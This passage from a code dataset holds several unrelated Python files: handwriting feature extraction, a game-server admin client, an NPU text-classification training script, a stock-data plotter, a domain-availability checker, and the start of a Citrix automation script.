r'C:/Users/jahna/Downloads/HQA/Crop/Crop', local = True, ruled = False):\n if local:\n self.path, self.img_name = path, img_name\n img = cv2.imread(f'{path}//{img_name}', 0)\n else:\n img, self.img_name = img_name, 'app image'\n if ruled:\n self.img = self.remove_rules(img)\n if not ruled:\n _, img = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)\n self.img = cv2.medianBlur(img, 5)\n else:\n _, img = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)\n self.img = cv2.medianBlur(img, 5)\n self.ruled = ruled\n \n # determins the positions in the image that corresponding to lines \n def preprocess(self):\n lines, img = self.tile_list(), self.img\n self.lines = lines\n self.label = self.label_words()\n if (np.unique(self.label).shape[0] <= len(lines) * 2) or self.ruled:\n self.label = self.label_cc()\n \n # ruled lines removal\n def remove_rules(self, img):\n gray, src_img = img.copy(), img.copy()\n _, binarized = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n _, binarized_inv = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)\n convert_r = lambda angle: np.pi * angle / 180\n convert_d = lambda angle: 180 * angle / np.pi\n width = binarized.shape[1] // 6\n select_block = lambda image, r, c: image[width*(r-1): width*r, width*(c-1): width*c]\n boxes_hough = []\n for i, j in [(3, 2), (3, 5), (5, 2), (5, 5)]:\n _, theta, distance = hough_line_peaks(\n *hough_line(select_block(binarized_inv, i, j)),\n threshold = (width * 2) // 3\n )\n boxes_hough.append(list(map(\n lambda y: (round(convert_d(y[0])) + ((y[0]<0)*180), y[1] * (y[0]//abs(y[0]))),\n zip(theta, distance)\n )))\n line_angles = [j[0] for i in map(lambda box: box[:2], boxes_hough) for j in i]\n if not all(boxes_hough):\n self.ruled = False\n return img\n votes = {angle: sum(map(lambda y: angle-3 <= y <= angle+3, line_angles)) for angle in set(line_angles)}\n for angle in line_angles:\n votes[angle] += 1\n line_angle = max(votes, key = lambda y: votes[y])\n matrix = np.eye(3)\n matrix[1][0] = convert_r(line_angle-90)\n hline_img = warp(\n src_img,\n matrix,\n mode = 'wrap',\n preserve_range = True\n )\n hline_img = np.uint8(hline_img)\n\n box_distances = []\n for box in boxes_hough:\n hlines = sorted([distance for angle, distance in box if line_angle-3 <= angle <= line_angle+3])\n distances = [hlines[idx+1] - hlines[idx] for idx in range(len(hlines)-1)]\n box_distances.append(np.mean(distances))\n dist = np.mean(box_distances, dtype = 'int')\n\n# gray = cv2.cvtColor(hline_img, cv2.COLOR_RGB2GRAY)\n _, binarized = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n _, binarized_inv = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)\n\n _, theta, distance = hough_line_peaks(*hough_line(select_block(binarized_inv, 1, 2)), threshold = (width * 2) // 3)\n upper_box = list(map(lambda y: (round(convert_d(y[0])) + ((y[0]<0)*180), y[1] * (y[0]//abs(y[0]))), (zip(theta, distance))))\n first_line = int(sorted(filter(lambda y: 87 <= y[0] <= 93, upper_box), key = lambda y: y[1])[0][1])\n\n test_subject, width = binarized_inv.copy(), gray.shape[1] // 6\n vline_strips = range(first_line - dist // 2, test_subject.shape[0] - dist, dist)\n for vstrip_idx in vline_strips:\n for hstrip_idx in range(0, 6*width, width):\n test_strip = test_subject[vstrip_idx: vstrip_idx+dist, hstrip_idx: hstrip_idx + width]\n hough, strip_theta, strip_dist = hough_line(test_strip)\n thresh, line_theta, line_dist = hough_line_peaks(hough, strip_theta, strip_dist, threshold = test_strip.shape[1] * (3/4), num_peaks = 1)\n if line_dist.shape[0] == 0:\n continue\n line_dist, line_theta, r, theta = (hough.shape[0] // 2) + int(line_dist[0]), round(convert_d(line_theta[0])) + 90, line_dist, line_theta\n cos, sin, w = np.cos(theta), np.sin(theta), test_strip.shape[1]\n thickness = (hough[line_dist-5:line_dist+5, line_theta] > (test_strip.shape[1] / 2)).sum()\n cv2.line(test_strip, (0, int(r/sin)), (w, int((r-(w*cos)) / sin)), 0, thickness)\n if shannon_entropy(test_strip) < 0.15:\n test_strip *= 0\n test_strip = cv2.dilate(cv2.medianBlur(test_strip, ksize = 3), kernel = np.ones((10, 1)))\n test_subject[vstrip_idx: vstrip_idx+dist, hstrip_idx: hstrip_idx + width] = test_strip\n return test_subject\n \n # performs line segementation \n def tile_list(self):\n hp = (self.img == 255).sum(axis = 1)\n arr = pd.Series(hp).rolling(30, min_periods = 1).sum().to_numpy()\n minima, switch = [[]], arr < arr.mean()\n for i in range(1, len(arr)):\n if switch[i] != switch[i-1]:\n if switch[i]:\n minima.append([i])\n else:\n minima[-1].append(i)\n minimum = [np.argmin(hp[:minima[0][0]])]\n for i in minima[1:-1]:\n minimum.append(np.argmin(hp[i[0]:i[1]]) + i[0])\n minimum.append(minima[-1][0] + np.argmin(hp[minima[-1][0]:]))\n return ([0] if minimum[0] != 0 else []) + minimum + ([self.img.shape[0]] if minimum[-1] != self.img.shape[0] else [])\n \n # word segmentation v2\n def label_words(self):\n lines, gaps, words_segmented, used, flag, img = self.lines, [], np.empty(shape = (0, self.img.shape[1]), dtype = 'int'), 0, False, self.img.copy()\n def label_new(img):\n if img.sum():\n dilated, line = img.copy(), img\n if line.sum():\n line_vp, gaps, count = np.trim_zeros(line.sum(axis= 0)), [], 0\n for i in line_vp:\n if not i:\n count += 1\n elif count:\n gaps.append(count)\n count = 0\n gaps = np.array(gaps)\n kernel = np.ones(shape = (50, 2))\n dilated = dilation(dilated, kernel)\n\n limg = (img == 255).astype('uint8')\n reg = pd.DataFrame(\n regionprops_table(label(dilated), properties = ('label', 'bbox', 'image', 'area'))\n ).set_index('label')\n c = 1\n for i, minr, minc, maxr, maxc, mask, area in reg.itertuples():\n limg[minr: maxr, minc: maxc][mask] *= c\n c += 1\n return limg\n else:\n return img\n\n warnings.filterwarnings('ignore')\n for line_no in range(len(lines)-1):\n line = label_new(img[lines[line_no]: lines[line_no+1]]).astype('int')\n line[line > 0] += used\n words_segmented, used = np.vstack((words_segmented, line)), line.max()\n max_index = img[lines[line_no]: lines[line_no+1]].sum(axis = 1).argmax()\n df = pd.DataFrame(regionprops_table(line, properties = ['label', 'centroid', 'bbox']))\n df.set_index('label', inplace = True)\n df.sort_values(by = 'centroid-1', inplace = True)\n for i in range(df.shape[0]-1):\n x, y = df.iloc[i].name, df.iloc[i+1].name\n t, b = max(df.loc[x, 'bbox-0'], df.loc[y, 'bbox-0']), min(df.loc[x, 'bbox-2'], df.loc[y, 'bbox-2'])\n left_x, left_y, right_x, right_y = df.loc[x, 'bbox-1'], df.loc[y, 'bbox-1'], df.loc[x, 'bbox-3'], df.loc[y, 'bbox-3']\n x_line, y_line = line == x, line == y\n words_mask = (x_line[t:b].sum(axis = 1) & y_line[t:b].sum(axis = 1)) != 0\n if (left_x < left_y < right_y < right_x) or (left_y < left_x < right_x < right_y):\n gaps.append((-1, x, y, 0))\n elif (t >= b) or ((words_mask != 0).sum() == 0):\n gaps.append((left_y - right_x, x, y, 0))\n else:\n target = np.argmin([np.argmax(y_line[i]) + np.argmax(x_line[i][::-1]) for i in np.arange(t, b)[words_mask]])\n left, right = 2400-np.argmax(x_line[t:b][words_mask][target][::-1]), np.argmax(y_line[t:b][words_mask][target])\n gaps.append((right - left, x, y, 0))\n else:\n gaps.append((0, 0, 0, 0))\n gaps, n = np.array(gaps, dtype = 'int'), 1\n gap_mask = (gaps[:, 0] > 0)\n gm = GaussianMixture(n_components = 2, random_state = 0)\n gm = gm.fit(np.vstack((gaps[:, :n][gap_mask], np.zeros((10, n)))))\n if (~gap_mask).sum():\n return self.label_cc()\n \n gap_predictions = gm.predict(gaps[:, :n][gap_mask])\n gap_label = np.argmin([gaps[gap_mask][gap_predictions == i][:, 0].mean() for i in range(2)])\n gaps[:, -1][gap_mask] = gap_predictions\n gaps[:, -1][~gap_mask] = gap_label\n\n\n prev = gaps[0, 2]\n for d, x, y, p in gaps:\n if d:\n prev = prev if prev else x\n if p == gap_label:\n words_segmented[words_segmented == y] = prev\n else:\n prev = y\n else:\n prev = 0\n iterations = 0\n while (gap_label in gap_predictions) and gap_mask.sum():\n img, gaps = words_segmented.copy(), []\n for line_no in range(len(lines)-1):\n line = img[lines[line_no]: lines[line_no+1]]\n df = pd.DataFrame(regionprops_table(line, properties = ['label', 'centroid', 'bbox']))\n df.set_index('label', inplace = True)\n df.sort_values(by = 'bbox-1', inplace = True)\n for i in range(df.shape[0]-1):\n x, y = df.iloc[i].name, df.iloc[i+1].name\n t, b = max(df.loc[x, 'bbox-0'], df.loc[y, 'bbox-0']), min(df.loc[x, 'bbox-2'], df.loc[y, 'bbox-2'])\n left_x, left_y, right_x, right_y = df.loc[x, 'bbox-1'], df.loc[y, 'bbox-1'], df.loc[x, 'bbox-3'], df.loc[y, 'bbox-3']\n x_line, y_line = line == x, line == y\n words_mask = (x_line[t:b].sum(axis = 1) & y_line[t:b].sum(axis = 1)) != 0\n if (left_x < left_y < right_y < right_x) or (left_y < left_x < right_x < right_y):\n gaps.append((-1, x, y, 0))\n elif (t >= b) or ((words_mask != 0).sum() == 0):\n gaps.append((left_y - right_x, x, y, 0))\n else:\n target = np.argmin([np.argmax(y_line[i]) + np.argmax(x_line[i][::-1]) for i in np.arange(t, b)[words_mask]])\n left, right = 2400-np.argmax(x_line[t:b][words_mask][target][::-1]), np.argmax(y_line[t:b][words_mask][target])\n gaps.append((right - left, x, y, 0))\n else:\n gaps.append((0, 0, 0, 0))\n gaps = np.array(gaps, dtype = 'int')\n gap_mask = (gaps[:, 0] > 0)\n if gap_mask.sum():\n gap_predictions = gm.predict(gaps[:, :n][gap_mask])\n gaps[:, -1][gap_mask] = gap_predictions\n elif (~gap_mask).sum():\n gaps[:, -1][~gap_mask] = gap_label\n prev = gaps[0, 2]\n for d, x, y, p in gaps:\n if d:\n prev = prev if prev else x\n if p == gap_label:\n words_segmented[words_segmented == y] = prev\n else:\n prev = y\n else:\n prev = 0\n iterations += 1\n if iterations == 10:\n break\n return words_segmented\n\n # word segmentation v1\n def label_cc(self):\n lines, dilated, img = self.lines, self.img.copy(), self.img\n for line_no in range(len(lines)-1):\n line = img[lines[line_no]: lines[line_no+1]]\n if line.sum():\n line_vp, gaps, count = np.trim_zeros(line.sum(axis= 0)), [], 0\n for i in line_vp:\n if not i:\n count += 1\n elif count:\n gaps.append(count)\n count = 0\n gaps = np.array(gaps)\n kernel_size = int(np.ceil(np.append([10], gaps[(gaps < 60) + (gaps > 5)]).mean()))\n kernel = np.ones(shape = (1, kernel_size))\n dilated[lines[line_no]: lines[line_no+1]] = dilation(dilated[lines[line_no]: lines[line_no+1]], kernel)\n \n limg = (img == 255).astype('uint8')\n reg = pd.DataFrame(\n regionprops_table(label(dilated), properties = ('label', 'bbox', 'image', 'area'))\n ).set_index('label')\n c = 1\n for i, minr, minc, maxr, maxc, mask, area in reg.itertuples():\n limg[minr: maxr, minc: maxc][mask] *= c\n c += 1\n return limg\n \n def outlier(self, arr):\n# print(arr.shape)\n p15 = np.quantile(arr, 0.15)\n return arr[arr >= p15]\n \n def entropy_bin(self, data, bin_width, round_off = False):\n if data.shape[0] == 0:\n return np.nan\n if round_off:\n cut = pd.cut(\n data,\n bins = np.arange(data.min() - bin_width, data.max(), bin_width)\n )\n else:\n cut = pd.cut(\n data,\n bins = np.arange(round(data.min()) - bin_width, round(data.max()), bin_width)\n )\n n = cut.shape[0]\n counts = cut.value_counts()\n return counts.apply(lambda v: -v * np.log2(v/n) / n).sum()\n\n # determines space between words and stores it in an array\n def space_fe(self):\n img, lines, label, space_list, space_img = self.img, self.lines, self.label, [], self.img.copy()\n for line_no in range(len(lines)-1):\n line, iline = label[lines[line_no]: lines[line_no+1]], img[lines[line_no]: lines[line_no+1]]\n max_index = iline.sum(axis = 1).argmax()\n df = pd.DataFrame(regionprops_table(line, properties = ['label', 'centroid', 'bbox']))\n df.set_index('label', inplace = True)\n df.sort_values(by = 'centroid-1', inplace = True)\n df = df[df['bbox-0'] < max_index]\n df = df[max_index < df['bbox-2']]\n for i in range(df.shape[0]-1):\n x, y = df.iloc[i].name, df.iloc[i+1].name\n t, b = max(df.loc[x, 'bbox-0'], df.loc[y, 'bbox-0']), min(df.loc[x, 'bbox-2'], df.loc[y, 'bbox-2'])\n x_line, y_line = line == x, line == y\n target = np.argmin([np.argmax(y_line[i]) + np.argmax(x_line[i][::-1]) for i in range(t, b)]) + t\n left, right = line.shape[1]-np.argmax(x_line[target][::-1]), np.argmax(y_line[target])\n space_list.append(right - left)\n # cv2.arrowedLine(iline, (left, target), (right, target), color = 200, thickness = 2)\n # cv2.arrowedLine(iline, (right, target), (left, target), color = 200, thickness = 2)\n # self.space_img = img\n space_list = self.outlier(np.array(space_list))\n series = pd.Series(\n data = [space_list.mean(), space_list.std(), self.entropy_bin(space_list, 10)],\n index = ['space_mean', 'space_std', 'space_entropy'],\n name = self.img_name\n )\n return series\n \n # space centroid \n def space1_fe(self):\n img, lines, label, space_list = self.img, self.lines, self.label, []\n for line_no in range(len(lines)-1):\n line, iline = label[lines[line_no]: lines[line_no+1]], img[lines[line_no]: lines[line_no+1]]\n max_index = iline.sum(axis = 1).argmax()\n df = pd.DataFrame(regionprops_table(line, properties = ['label', 'centroid', 'bbox']))\n df.set_index('label', inplace = True)\n df.sort_values(by = 'centroid-1', inplace = True)\n for i in range(df.shape[0]-1):\n x, y = df.iloc[i]['centroid-1'], df.iloc[i+1]['centroid-1']\n x_width , y_width = (df.iloc[i]['bbox-3'] - df.iloc[i]['bbox-1']) , (df.iloc[i+1]['bbox-3'] - df.iloc[i+1]['bbox-1'])\n centroid_dist = y - x - (x_width + y_width) / 2 \n space_list.append(centroid_dist)\n space_list = self.outlier(np.array(space_list))\n space_list = space_list[space_list >= 0]\n series = pd.Series(\n data = [space_list.std() , space_list.mean(), self.entropy_bin(space_list, 10)],\n index = ['space1_std', 'space1_mean', 'space1_entropy'],\n name = self.img_name\n )\n return series \n \n # determines space between words and stores it in an array (modified)\n def space2_fe(self):\n img, lines, label, space_list, space_img = self.img, self.lines, self.label, [], self.img.copy()\n for line_no in range(len(lines)-1):\n line, iline = label[lines[line_no]: lines[line_no+1]], img[lines[line_no]: lines[line_no+1]]\n max_index = iline.sum(axis = 1).argmax()\n df = pd.DataFrame(regionprops_table(line, properties = ['label', 'centroid', 'bbox']))\n df.set_index('label', inplace = True)\n df.sort_values(by = 'centroid-1', inplace = True)\n df = df[df['bbox-0'] < max_index]\n df = df[max_index < df['bbox-2']]\n for i in range(df.shape[0]-1):\n x, y = df.iloc[i].name, df.iloc[i+1].name\n t, b = max(df.loc[x, 'bbox-0'], df.loc[y, 'bbox-0']), min(df.loc[x, 'bbox-2'], df.loc[y, 'bbox-2'])\n x_line, y_line = line == x, line == y\n words_mask = (x_line[t:b].sum(axis = 1) & y_line[t:b].sum(axis = 1)) != 0\n # left, right = line.shape[1]-np.argmax(x_line[target][::-1]), np.argmax(y_line[target])\n if (t >= b) or ((words_mask != 0).sum() == 0):\n continue\n target = np.argmin([np.argmax(y_line[i]) + np.argmax(x_line[i][::-1]) for i in np.arange(t, b)[words_mask]])\n left, right = 2400-np.argmax(x_line[t:b][words_mask][target][::-1]), np.argmax(y_line[t:b][words_mask][target])\n space_list.append(right - left)\n cv2.arrowedLine(iline, (left, target), (right, target), color = 200, thickness = 2)\n cv2.arrowedLine(iline, (right, target), (left, target), color = 200, thickness = 2)\n self.space_img = img\n space_list = self.outlier(np.array(space_list))\n series = pd.Series(\n data = [space_list.mean(), space_list.std(), self.entropy_bin(space_list, 10)],\n index = ['space2_mean', 'space2_std', 'space2_entropy'],\n name = self.img_name\n )\n return series\n \n def slant_fe(self, ret = False):\n # extracts the slant for each word \n def slant(word):\n hp, vp, scores = word.sum(axis = 1), word.sum(axis = 0), []\n f, b = np.argmax(hp>0), word.shape[0] - np.argmax(hp[::-1]>0)\n l, r = np.argmax(vp>0), word.shape[1] - np.argmax(vp[::-1]>0)\n word = word[f:b+1, l:r+1]\n matrix, scores, w = np.eye(3), [], word.shape[0]\n for i in np.linspace(-1, 1, 91):\n matrix[0][1] = i\n word_sheared = warp(word, matrix, mode='wrap')\n trim, vp = [w - np.argmax(col) - np.argmax(col[::-1]) for col in word_sheared.T], word_sheared.sum(axis = 0)\n scores.append((vp[trim == vp]**2).sum())\n return 45 + np.argmax(scores)\n\n temp = regionprops_table(self.label, properties = ['label', 'area'], extra_properties=[slant])\n slants, weights = temp['slant'], temp['area']\n self.slant_img = self.color(slants, temp['label'])\n slants = self.outlier(slants[weights > np.quantile(weights, 0.25)])\n series = pd.Series(\n data = [slants.mean(), slants.std(), self.entropy_bin(slants, 4)],\n index = ['slant_mean', 'slant_std', 'slant_entropy'],\n name = self.img_name\n )\n return temp['slant'] if ret else series\n\n # height feature extractor\n def height_fe(self, ret = False):\n def height(word):\n li = np.apply_along_axis(lambda col: word.shape[0] - np.argmax(col) if col.sum() else 0, 0, word)\n return li.mean() + li.std()\n temp = regionprops_table(self.label, properties = ['area'], extra_properties = [height])\n heights, weights = temp['height'], temp['area']\n heights = self.outlier(heights[weights > np.quantile(weights, 0.25)])\n series = pd.Series(\n data = [heights.mean(), heights.std(), self.entropy_bin(heights, 10)],\n index = ['height_mean', 'height_std', 'height_entropy'],\n name = self.img_name\n )\n return temp['height'] if ret else series\n \n # height1 feature extractor\n def height1_fe(self, ret = False):\n temp = regionprops_table(self.label, properties = ['bbox', 'area'])\n heights, weights = temp['bbox-2'] - temp['bbox-0'], temp['area']\n # self.height_img = self.color(heights)\n heights = self.outlier(heights[weights > np.quantile(weights, 0.25)])\n series = pd.Series(\n data = [heights.mean(), heights.std(), self.entropy_bin(heights, 10)],\n index = ['height1_mean', 'height1_std', 'height1_entropy'],\n name = self.img_name\n )\n return temp['bbox-2'] - temp['bbox-0'] if ret else series\n \n def height2_fe(self, ret = False):\n lines = pd.Series(self.lines)\n lines = (lines - lines.shift()).iloc[:-1].dropna()\n series = pd.Series(\n data = [lines.mean(), lines.std(), self.entropy_bin(lines, 10)],\n index = ['height2_mean', 'height2_std', 'height2_entropy'],\n name = self.img_name\n )\n return lines if ret else series\n \n # improved height function\n def height3_fe(self, ret = False):\n def height(img):\n hp = np.sum(img, axis=1)\n max_pos = np.argmax(hp)\n threshold = hp[max_pos]/3\n b, e = max_pos, max_pos\n while (hp[b] > threshold and b != 0) or (hp[e]> threshold and e != len(hp)-1):\n if hp[b] > threshold and (b > 0):\n b -= 1\n if hp[e] > threshold and (e < len(hp)-1):\n e+=1\n return e-b\n temp = regionprops_table(self.label, properties = ['label', 'area'], extra_properties = [height])\n heights, weights = temp['height'], temp['area']\n self.height_img = self.color(heights, temp['label'])\n heights = heights[weights > np.quantile(weights, 0.1)]\n series = pd.Series(\n data = [heights.mean(), heights.std(), self.entropy_bin(heights, 10)],\n index = ['height3_mean', 'height3_std', 'height3_entropy'],\n name = self.img_name\n )\n return heights if ret else series\n\n \n\n # Area \n def area_fe(self, ret = False):\n temp = regionprops_table(self.label, properties = ['area', 'bbox', 'label'])\n heights = temp['area'] / (temp['bbox-3'] - temp['bbox-1'])\n self.area_img = self.color(heights, temp['label'])\n weights, h = temp['area'], heights\n heights = self.outlier(heights[weights > np.quantile(weights, 0.25)])\n series = pd.Series(\n data = [heights.mean(), heights.std(), self.entropy_bin(heights, 2, round_off = True)],\n index = ['area_mean', 'area_std', 'area_entropy'],\n name = self.img_name\n )\n return h if ret else series\n \n # Solidity \n def solidity_fe(self, ret = False):\n temp = regionprops_table(self.label, properties = ['area', 'solidity'])\n weights, heights = temp['area'], temp['solidity']\n heights = self.outlier(heights[weights > np.quantile(weights, 0.25)])\n series = pd.Series(\n data = [heights.mean(), heights.std(), self.entropy_bin(heights, 0.1, round_off = True)],\n index = ['solidity_mean', 'solidity_std', 'solidity_entropy'],\n name = self.img_name\n )\n return heights if ret else series\n \n # Extent \n def extent_fe(self, ret = False):\n temp = regionprops_table(self.label, properties = ['area', 'extent'])\n weights, heights = temp['area'], temp['extent']\n heights = self.outlier(heights[weights > np.quantile(weights, 0.25)])\n series = pd.Series(\n data = [heights.mean(), heights.std(), self.entropy_bin(heights, 0.1, round_off = True)],\n index = ['extent_mean', 'extent_std', 'extent_entropy'],\n name = self.img_name\n )\n return heights if ret else series\n\n def word_fe(self):\n self.preprocess()\n return pd.concat(\n (\n self.slant_fe(),\n # self.space_fe(),\n self.space1_fe(),\n self.space2_fe(),\n self.height_fe(),\n self.height1_fe(),\n # self.height2_fe(),\n self.height3_fe(),\n self.area_fe(),\n self.extent_fe(),\n self.solidity_fe()\n )\n )\n \n def color(self, li, labels):\n img = self.label.astype(float).copy()\n for i, j in zip(labels, li):\n img[img == i] *= j / i\n return img\n \n","repo_name":"adityad1/hwa","sub_path":"hwa1.py","file_name":"hwa1.py","file_ext":"py","file_size_in_byte":26756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24603105070","text":"#coding=utf-8\nimport requests\n\nclass MHCP001:\n cmds=[\n ('game',['start','stop','pause']),\n ('ban',['ip','name','clear']),\n ('player',['kill','heal']),\n ('set',['count','word','pos']),\n ('su',['on','off']),\n ]\n\n def __init__(self,dialog,servervar,resultvar,evalvar,evaltext):\n self.dialog=dialog\n self.s=requests.Session()\n self.s.trust_env=False\n self.servervar=servervar\n self.resultvar=resultvar\n self.evalvar=evalvar\n self.evaltext=evaltext\n\n def init_auth(self,un,pw):\n self.s.auth=(un,pw)\n \n def post_cmd(self,*args):\n try:\n return self.s.post(\n 'http://'+self.servervar.get()+':7654/cardinal',\n data={\n 'cmd': ' '.join(args)\n }\n ).text\n except Exception as e:\n return '%s %s'%(type(e),e)\n\n def run(self,cmd1,cmd2):\n if cmd1=='player' or (cmd1=='ban' and cmd2!='clear') or cmd1=='set':\n another=self.dialog.askstring('MHCP001','%s %s'%(cmd1,cmd2))\n if another is not None:\n return self.post_cmd(cmd1,cmd2,another)\n else:\n return '(canceled)'\n else:\n return self.post_cmd(cmd1,cmd2)\n\n def runner(self,cmd1,cmd2):\n return lambda: self.resultvar.set(self.run(cmd1,cmd2))\n\n def submit_eval(self):\n arg=self.evalvar.get()\n self.evaltext.insert('end','>>> ','prompt')\n self.evaltext.insert('end',arg+'\\n','input')\n self.evaltext.insert('end',self.post_cmd('eval',arg)+'\\n')\n self.evaltext.see('end')","repo_name":"xmcp/cer","sub_path":"cerutils/mhcp.py","file_name":"mhcp.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"72867110302","text":"import time\nimport torch\nimport numpy as np\nfrom train_eval import train, init_network\nfrom importlib import import_module\nimport argparse\nimport torch.distributed as dist\nimport os\nfrom apex import amp\nimport apex\n\nif torch.__version__ >= '1.8':\n import torch_npu\n \nparser = argparse.ArgumentParser(description='Chinese Text Classification')\nparser.add_argument('--model', type=str, required=True, help='choose a model: TextCNN, TextRNN, FastText, TextRCNN, TextRNN_Att, DPCNN, Transformer')\nparser.add_argument('--embedding', default='pre_trained', type=str, help='random or pre_trained')\nparser.add_argument('--word', default=False, type=bool, help='True for word, False for char')\n# DDP argument.\nparser.add_argument('--dist_backend', default='hccl', type=str, help='hccl for npu, must!')\nparser.add_argument('--world_size', default=1, type=int, help='ddp world size')\nparser.add_argument('--local_rank', default=0, type=int, help='local rank')\nparser.add_argument('--num_epochs', default=20, type=int, help='number of train epoch')\nparser.add_argument('--distributed', action=\"store_true\", help='distributed')\nparser.add_argument('--data_path', default='THUCNews', type=str, help='data path')\nargs = parser.parse_args()\n\n\ndef main():\n dataset = args.data_path # 数据集\n print(\"args.world_size = \", args.world_size)\n print(\"args.addr = \", os.environ[\"MASTER_ADDR\"])\n print(\"args.Port = \", os.environ[\"MASTER_PORT\"])\n args.rank = 0\n\n if args.distributed:\n args.device = 'npu:%d' % args.local_rank\n torch.npu.set_device(args.device)\n dist.init_process_group(backend=args.dist_backend, world_size=args.world_size, rank=args.local_rank)\n args.world_size = int(os.environ['WORLD_SIZE'])\n args.rank = torch.distributed.get_rank()\n\n else:\n args.device = f'npu:{args.local_rank}'\n torch.npu.set_device(args.device)\n\n print('local_rank {}'.format(args.local_rank))\n\n # 搜狗新闻:embedding_SougouNews.npz, 腾讯:embedding_Tencent.npz, 随机初始化:random\n embedding = 'embedding_SougouNews.npz'\n if args.embedding == 'random':\n embedding = 'random'\n model_name = args.model # 'TextRCNN' # TextCNN, TextRNN, FastText, TextRCNN, TextRNN_Att, DPCNN, Transformer\n if model_name == 'FastText':\n from utils_fasttext import build_dataset, build_iterator, get_time_dif\n embedding = 'random'\n else:\n from utils import build_dataset, build_iterator, get_time_dif\n\n x = import_module('models.' + model_name)\n config = x.Config(dataset, embedding)\n\n config.device = args.device\n config.world_size = args.world_size\n config.local_rank = args.local_rank\n config.batch_size = config.batch_size * config.world_size\n config.distributed = args.distributed\n config.num_epochs = args.num_epochs\n\n np.random.seed(666)\n torch.manual_seed(666)\n torch.npu.manual_seed_all(666)\n torch.backends.cudnn.deterministic = True # 保证每次结果一样\n\n start_time = time.time()\n print(\"Loading data...\")\n vocab, train_data, dev_data, test_data = build_dataset(config, args.word)\n train_iter = build_iterator(train_data, config)\n dev_iter = build_iterator(dev_data, config)\n test_iter = build_iterator(test_data, config)\n time_dif = get_time_dif(start_time)\n print(\"Time usage:\", time_dif)\n\n # train\n config.n_vocab = len(vocab)\n model = x.Model(config).to(config.device)\n\n optimizer = apex.optimizers.NpuFusedAdam(model.parameters(), lr=config.learning_rate)\n\n model, optimizer = amp.initialize(model, optimizer, opt_level='O2', loss_scale=\"dynamic\", combine_grad=True,master_weights=True)\n \n\n if config.distributed:\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.local_rank], broadcast_buffers=False) \n if model_name != 'Transformer':\n init_network(model)\n print(model.parameters)\n train(config, model, train_iter, dev_iter, test_iter, optimizer)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/contrib/nlp/TextCNN/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"9509009252","text":"import pandas as pd\nimport requests\nimport matplotlib.pyplot as plt\n\n# Define the stock symbols to fetch data for\nstock_list = ['SBIN', 'ASIANPAINT', 'AXISBANK']\n\n# Define the URL to fetch stock data from\nurl = f'https://api.nsepy.xyz/api/get_history?symbol={{}}&series=EQ&from=2015-01-01&to=2015-01-09'\n\n# Fetch data for each stock and combine into a single DataFrame\ndf_list = []\nfor stock in stock_list:\n response = requests.get(url.format(stock))\n data = response.json()['data']\n df = pd.DataFrame(data)\n df = df[['Date', 'Close']]\n df.rename(columns={'Close': f'{stock}_close'}, inplace=True)\n df_list.append(df)\ntable_value = pd.concat(df_list, axis=1)\n\n# Plot the stock data\ntable_value.set_index('Date').plot()\nplt.show()\n","repo_name":"mushirmansoori/Assignments","sub_path":"Quest1.py","file_name":"Quest1.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26218858803","text":"#!/usr/bin/env python\nfrom time import sleep\nimport sys\ntry:\n\timport whois\nexcept ImportError:\n\tprint(\"ERROR: This script requires the python-whois module to run.\")\n\tprint(\" You can install it via 'pip install python-whois'\")\n\tsys.exit(0)\n\n# Change top-level domain to check here\nTLD = '.com'\n\n# 1. Get prefixes and suffixes from input.txt\nsuffixes = []\nprefixes = []\nreadingPrefixes = False\nf = open('input.txt')\nfor l in f:\n\tline = l.strip()\n\tif line == '--prefixes':\n\t\treadingPrefixes = True\n\t\tcontinue\n\telif line == '--suffixes':\n\t\treadingPrefixes = False\n\t\tcontinue\n\telif not line:\n\t\tcontinue # Ignore empty lines\n\tif readingPrefixes:\n\t\tprefixes.append(line)\n\telse:\n\t\tsuffixes.append(line)\nf.close()\n\n# 2. create list of domains from prefixes and suffixes\ndomains\t=[]\nfor pre in prefixes:\n\tfor suff in suffixes:\n\t\tdomains.append( pre + suff + TLD)\n\n# 3. Get list of domains that have aleady found to be free and removed them\ncheckeddomains= [line.strip() for line in open('free-domains.txt')] # Strip out newlines too\nfor remove in checkeddomains:\n\ttry:\n\t\tdomains.remove(remove)\n\texcept ValueError:\n\t\tpass # Ignore exceptions\n\n# 4. Check list of domains and write to file\nfor domain in domains:\n\tsleep(0.5) # Too many requests lead to incorrect responses\n\tprint(' Checking: ' + domain), # Comma means no newline is printed\n\ttry:\n\t\tw = whois.whois(domain)\n\t\tprint('\\tTAKEN')\n\texcept whois.parser.PywhoisError:\n\t\t# Exception means that the domain is free\n\t\tprint('\\tFREE')\n\t\tf = open('free-domains.txt', 'a')\n\t\tf.write(domain + '\\n')\n\t\tf.close()\nprint(\"DONE!\")\n","repo_name":"caspii/domainfinder","sub_path":"find.py","file_name":"find.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"7"} +{"seq_id":"29916543616","text":"import configparser\nimport datetime\nimport os\nimport logging\nimport logging.config\nimport stat\nimport web_ops\nimport message_ops\nimport mouse_work\n\n\ndef main():\n \"\"\"\n Основная логика\n :return:\n \"\"\"\n\n citrix_adr = config.get('CITRIX', 'address')\n logging.info('Этап: Запуск Firefox и Переход по ссылке CITRIX \"{}\"'.format(citrix_adr))\n ctx = web_ops.open_citrix(citrix_adr)\n stage_result()\n\n logging.info('Этап: 